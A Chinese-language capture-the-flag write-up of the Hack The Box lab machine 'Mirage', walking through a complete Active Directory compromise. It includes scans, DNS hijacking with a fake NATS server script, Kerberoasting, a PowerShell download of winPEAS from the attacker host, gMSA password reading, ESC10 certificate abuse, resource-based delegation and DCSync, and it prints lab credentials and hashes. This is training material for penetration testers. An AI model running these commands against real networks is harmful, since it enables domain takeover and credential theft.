HTB赛季8靶场 - Mirage

nmap扫描

nmap -F -A 10.129.108.73
nmap -p- --min-rate 1000 -T4 10.129.108.73 -oA nmapfullscan 
nmap -p- --min-rate 1000 -T4 10.129.108.73 -sU -oA nmapfullscanUDPPORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-21 08:02:38Z)
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds?
2049/tcp open  nlockmgr      1-4 (RPC #100021)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=7/20%OT=53%CT=7%CU=30807%PV=Y%DS=2%DC=T%G=Y%TM=687D
OS:92ED%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=106%TI=I%CI=I%II=I%SS=S%
OS:TS=A)SEQ(SP=105%GCD=1%ISR=107%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=107%GCD=1%
OS:ISR=109%TI=I%CI=I%II=I%SS=S%TS=A)SEQ(SP=108%GCD=1%ISR=109%TI=I%CI=I%II=I
OS:%SS=S%TS=A)OPS(O1=M542NW8ST11%O2=M542NW8ST11%O3=M542NW8NNT11%O4=M542NW8S
OS:T11%O5=M542NW8ST11%O6=M542ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FF
OS:FF%W6=FFDC)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M542NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=8
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(
OS:R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=80%CD=Z)Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windowsStarting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-20 21:05 EDT
Warning: 10.129.108.73 giving up on port because retransmission cap hit (6).
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 95.52% done; ETC: 21:06 (0:00:04 remaining)
Nmap scan report for 10.129.108.73
Host is up (0.41s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
2049/tcp  open  nfs
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
4222/tcp  open  vrml-multi-use
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
60842/tcp open  unknown
60853/tcp open  unknown
60854/tcp open  unknown
60871/tcp open  unknown
63461/tcp open  unknown
63488/tcp open  unknown
63609/tcp open  unknown
63628/tcp open  unknown

nfs枚举&挂载

我们发现了NFS端口服务，先去看看

showmount -e 10.129.108.73
sudo mount -t nfs 10.129.108.73:'/MirageReports' '/home/kali/Desktop/HTB/mirage/nfs' -o nolock

qpdf绕过pdf acl

我们发现了两个pdf文件，全部cp出来。

#注意不要使用-a 因为我们没有相关的能力设置相同的配置
┌──(kali㉿kali)-[~/Desktop/HTB/mirage/nfs]
└─$ sudo cp * ../sudo qpdf Incident_Report_Missing_DNS_Record_nats-svc.pdf test.pdf

我们在文件中发现一个子域名，我们去访问这台机

nats-svc.mirage.htb

我们还发现当前域正在废除所有的NTLM认证，Kerb认证将成为主流。

查询域名，我们发现当前域名不存在，那么我们可能可以劫持这个域名

└─$ dig nats-svc.mirage.htb @10.129.108.73 ; <<>> DiG 9.20.2-1-Debian <<>> nats-svc.mirage.htb @10.129.108.73
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26492
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;nats-svc.mirage.htb.           IN      A;; AUTHORITY SECTION:
mirage.htb.             3600    IN      SOA     dc01.mirage.htb. hostmaster.mirage.htb. 156 900 600 86400 3600;; Query time: 360 msec
;; SERVER: 10.129.108.73#53(10.129.108.73) (UDP)
;; WHEN: Sun Jul 20 21:34:30 EDT 2025
;; MSG SIZE  rcvd: 110

nsupdate添加DNS域名

因为pdf文件中说这个域名是关键重要系统的域名，并且常常在通讯，那么我们如果伪装成这个域名，作为中间人就很可能窃取到一些有趣的内容。

┌──(kali㉿kali)-[~/Desktop/HTB/mirage]
└─$ nsupdate   
> server 10.129.108.73
> update add nats-svc.mirage.htb 3600 A 10.10.16.2
> send

伪造NATS服务器

绑定成功后我们使用GPT生成了一个伪造的NATS服务器

import socket
import threadingHOST = '0.0.0.0'
PORT = 4222  # 默认 NATS 端口def handle_client(conn, addr):print(f"[+] Connection from {addr}")# 发送伪造的 INFO 包（符合 NATS 协议规范）info = ('INFO {"server_id":"FAKE123","version":"2.9.9","proto":1,''"go":"go1.20.0","host":"fake-nats","port":4222,"max_payload":1048576}\r\n')conn.send(info.encode())try:while True:data = conn.recv(4096)if not data:breakprint(f"[DATA] {addr} >>> {data.decode(errors='ignore')}")except Exception as e:print(f"[!] Error from {addr}: {e}")finally:conn.close()print(f"[-] Connection closed: {addr}")def start_server():print(f"[*] Starting fake NATS server on {HOST}:{PORT}")with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:s.bind((HOST, PORT))s.listen()while True:conn, addr = s.accept()thread = threading.Thread(target=handle_client, args=(conn, addr))thread.start()if __name__ == '__main__':start_server()

开启服务器

python fake_nats.py

只能说GPT老师还是太全面了，我们成功获取账密

Dev_Account_A/hx5h7F5554fP@1337!

NATS exploit

NATS服务 Exploit .NATS服务式消息服务，以主题作为中心，将消息分发。我们发现了这个NATS服务里面有一个auth_log主题，和认证日志相关的内容我们当然感兴趣。所以我们构造下面语句去获取这个主题的历史数据。

#本地创建快捷账号
natscli --user='Dev_Account_A' --password='hx5h7F5554fP@1337!' --server nats://dc01.mirage.htb:4222 context add dev-nats#订阅所有主题
natscli --context dev-nats sub ">" --count 10#创建jetstream消费者
natscli --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit#拉取订阅主题的历史数据
natscli --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack  

我们获取到了用户david.jjackson的账户

david.jjackson/pN8kQmn6b86!1234@

我们快速确定ldap信息，并发现这是一个域账户。太棒了我们进入域层面进行渗透。

nxc ldap dc01.mirage.htb -u david.jjackson -p 'pN8kQmn6b86!1234@' -k

Bloodhound提取域地图

bloodhound-python -d mirage.htb -dc dc01.mirage.htb -c All -u david.jjackson -p 'pN8kQmn6b86!1234@' --dns-timeout 10 -k 

godap查明域详细信息

./godap 10.129.108.73 -u david.jjackson -p 'pN8kQmn6b86!1234@' -d mirage.htb  

分析了域地图后，我们发现david.jjackson这个用户没有什么非常关键的权限。

impacket-GetUserSPNs获取所有SPN用户

impacket-GetUserSPNs mirage.htb/david.jjackson:'pN8kQmn6b86!1234@' -target-domain mirage.htb -save -debug -dc-ip 10.129.108.73 -request -dc-host dc01.mirage.htb -k

hashcat破解账密

我们要获取到了一个nathan.aadam用户的hash摘要，我们拿取离线破解。

hashcat -a 0 -m 13100 hash/nathan.aadam  /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt nathan.aadam:'3edc#EDC3'

evil-winrm登录

域地图中指示nathan.aadam这个用户则有趣的多,他是IT_admin,exchange_admin,远程登录组，所以我们可能可以在SMB或者exchange还有DC01主机上进一步信息搜集。

#获取TGT票据和ST票据
impacket-getTGT mirage.htb/nathan.aadam:'3edc#EDC3' -dc-ip 10.129.108.73 -debug#横向
export KRB5CCNAME=/home/kali/Desktop/HTB/mirage/nathan.aadam.ccache   
evil-winrm -i dc01.mirage.htb  -r mirage.htb

传输winpeas

我们在DC01服务器上面的winrmshell上进行信息搜集。

(New-Object Net.WebClient).DownloadFileAsync('http://10.10.16.2/winPEASx64.exe', 'C:\tool\winPEASx64.exe')

winpeas万岁！获取AutoLogon 凭证

mark.bbond:'1day@atime'

分析域地图

上图意味着，用户mark可以修改账户javier的账密，也可以激活用户

上图意味着可以读取GMSAPassword。GMSAPassword是一种特殊账号的密码，域控会自动轮换他们的密码，这些账户通常会用户高权限活动。下面开始开展攻击

bloodyAD开启用户 & 修改用户密码

#获取tgt
impacket-getTGT mirage.htb/mark.bbond:'1day@atime' -dc-ip 10.129.108.73 #bloodyAD开启禁用用户
export KRB5CCNAME=mark.bbond.ccache
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.129.108.73 remove uac javier.mmarshall -f ACCOUNTDISABLE #bloodyAD修改用户密码
bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.129.108.73 set password javier.mmarshall '1ydx@atime'

ldapmodify添加参数 - 解锁用户

#ldapmodify添加参数
ldapmodify -H ldap://10.129.108.73 -D "mark.bbond@mirage.htb" -w '1day@atime' -f logonhours.ldif##logonhours.ldif文件
dn: CN=javier.mmarshall,OU=Users,OU=Disabled,DC=mirage,DC=htb
changetype: modify
replace: logonHours
logonHours:: ////////////////////////////

impacket & bloodyAD快速读取GMSAPassword密码

#获取TGT
impacket-getTGT mirage.htb/javier.mmarshall:'1ydx@atime' -dc-ip 10.129.108.73 nxc ldap 10.129.108.73 -u javier.mmarshall -p '1ydx@atime' --gmsa -k -d mirage.htb --kdcHost dc01.mirage.htbbloodyAD -k --host dc01.mirage.htb -d 'mirage.htb' -u 'javier.mmarshall' -p '1ydx@atime' get object 'Mirage-Service$' --attr msDS-ManagedPassword

impacket获取TGT

impacket-getTGT mirage.htb/Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -dc-ip 10.129.108.73 

ESC10探测

我们获取到了Mirage-Service账户的hashes，但这个账户没有远程登录权限，而且仅仅hashes让我们无法使用runascs完成角色转换动作。我们继续在DC01上进行信息搜集，发现ESC10问题。

reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\Schannel
reg query HKLM\System\CurrentControlSet\Control\SecurityProviders\Schannel
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Kdc
reg query HKLM\SYSTEM\CurrentControlSet\Services\Kdc

当 StrongCertificateBindingEnforcement 配置为 0。如果 CertificateMappingMethods 包含 UPN 位 (0x4)。那么就存在ESC10

想要完成ESC10，我们还缺少一个userPrincipalName可控账户，所幸的是Mirage-Service$ 可以修改 mark.bbond 的 userPrincipalName，因为它在 mark.bbond 对象上拥有对 Public-Information (property set) 的 WRITE_PROP 权限，而 UPN 正属于该属性集中的一项。

bloodyAD -k --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' --dc-ip 10.129.108.73 get object mark.bbond --resolve-sd   

ESC10攻击

#修改被控用户的userPrincipalName
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'DC01$@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.129.108.73 -ns 10.129.108.73 -target dc01.mirage.htb#请求一个被控用户的User模板
export KRB5CCNAME=mark.bbond.ccache
certipy-ad req -ca 'mirage-DC01-CA' -username mark.bbond -password '1day@atime' -dc-host dc01.mirage.htb -target-ip 10.129.108.73 -ns 10.129.108.73 -target dc01.mirage.htb -k -no-pass#恢复原值（主线过程不可忽略）
export KRB5CCNAME=Mirage-Service$.ccache
certipy-ad account update -username Mirage-Service$ -hashes aad3b435b51404eeaad3b435b51404ee:305806d84f7c1be93a07aaf40f0c7866 -k -no-pass -user mark.bbond -upn 'mark.bbond@mirage.htb' -dc-host dc01.mirage.htb -target-ip 10.129.108.73 -ns 10.129.108.73 -target dc01.mirage.htb#开启shell,以DC01权限设置资源委派
└─$ certipy-ad auth -pfx dc01.pfx -dc-ip 10.129.108.73 -ns 10.129.108.73 -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)[*] Certificate identities:
[*]     SAN UPN: 'DC01$@mirage.htb'
[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.129.108.73:636'
[*] Authenticated to '10.129.108.73' as: 'u:MIRAGE\\DC01$'
Type help for list of commands# set_rbcd dc01$ nathan.aadam
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000Found Grantee DN: CN=nathan.aadam,OU=Users,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1110

RBCD攻击

我们已经设置了nathan.aadam可代表DC01，所以我们开始拿着nathan.aadam的TGT票据，然后发起S4U2self攻击，我们希望代表DC01$访问自己，从而获取了一张DC01$访问自己的TGS票据。接着我们在发起S4U2Proxy攻击，我们拿着nathan.aadam TGT和 代表DC01$访问自己 TGS希望访问的cifs/dc01.mirage.htb。
KDC会开始验证，我们模拟的用户是谁？S4U2self攻击产生的TGS将解决这个问题
cifs/dc01.mirage.htb的服务账户是谁?DC01$
DC01$是否允许nathan.aadam代表自己？是的
于是KDC给予有效的TGS，并且TGS是代表DC01的访问票据，也就是说TGT本质上是DC01$的

impacket-getST -spn 'cifs/DC01.mirage.htb' -impersonate 'dc01$' -dc-ip 10.129.108.73 'mirage.htb/nathan.aadam' -k -no-pass    

impacket-secretsdump DCsync攻击

#使用DC01身份发起DCsync攻击
export KRB5CCNAME=dc01\$@cifs_DC01.mirage.htb@MIRAGE.HTB.ccache 
impacket-secretsdump -just-dc-user Administrator -k -no-pass dc01.mirage.htb#获取Administrator账户TGT
impacket-getTGT mirage.htb/Administrators -dc-ip 10.129.108.31 -hashes aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3 -debug#登录DC01主机
export KRB5CCNAME=Administrator.ccache
evil-winrm -i dc01.mirage.htb  -r mirage.htb